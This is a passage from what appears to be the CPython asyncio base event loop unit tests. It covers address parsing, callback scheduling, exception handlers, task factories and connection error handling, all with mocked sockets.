base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
return []
# logging needs debug flag
self.loop.set_debug(True)
# Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(BaseException):
pass
async def foo(delay):
await asyncio.sleep(delay, loop=self.loop)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
try:
self.loop.run_until_complete(foo(0.1))
except ShowStopper:
pass
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
yield from asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(hasattr(socket, 'AF_INET6'), 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(
lambda: None, '::1', 0, loop=self.loop)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
